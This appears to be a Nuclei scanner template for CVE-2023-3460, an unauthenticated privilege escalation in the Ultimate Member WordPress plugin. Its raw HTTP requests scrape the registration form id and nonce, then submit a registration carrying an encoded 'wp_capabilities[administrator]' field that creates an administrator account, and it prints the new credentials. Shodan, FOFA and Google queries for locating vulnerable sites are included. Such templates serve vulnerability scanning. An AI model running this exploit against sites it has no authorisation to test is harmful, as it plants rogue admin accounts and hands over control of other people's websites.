Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation

id: CVE-2023-3460

info:
  name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation
  author: DhiyaneshDk
  severity: critical
  description: |
    The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
  impact: |
    Unauthenticated users can gain unauthorized access and perform actions with elevated privileges.
  remediation: |
    Upgrade to Ultimate Member version 2.6.7 or later.
  reference:
    - https://github.com/gbrsh/CVE-2023-3460
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3460
    - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7
    - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/
    - https://wordpress.org/plugins/ultimate-member/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3460
    cwe-id: CWE-269
    epss-score: 0.06326
    epss-percentile: 0.93621
    cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: ultimatemember
    product: ultimate_member
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ultimate-member
    fofa-query: body=/wp-content/plugins/ultimate-member
    publicwww-query: /wp-content/plugins/ultimate-member
    google-query: inurl:/wp-content/plugins/ultimate-member
  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.php/register/?{{version}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1

    matchers:
      - type: dsl
        dsl:
          - contains(to_lower(body_1), "ultimate member")
          - regex("wordpress_logged_in_[a-z0-9]{32}", header_4)
          - status_code_4 == 302
        condition: and

    extractors:
      - type: regex
        name: path
        part: location_2
        group: 1
        regex:
          - '([a-z:/.]+)'
        internal: true

      - type: regex
        name: version
        part: body_1
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

      - type: regex
        name: formid
        part: body_3
        group: 1
        regex:
          - 'name="form_id" id="form_id_([0-9]+)"'
        internal: true

      - type: regex
        name: wpnonce
        part: body_3
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-z]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ username'
          - '"WP_PASSWORD: "+ password'
# digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950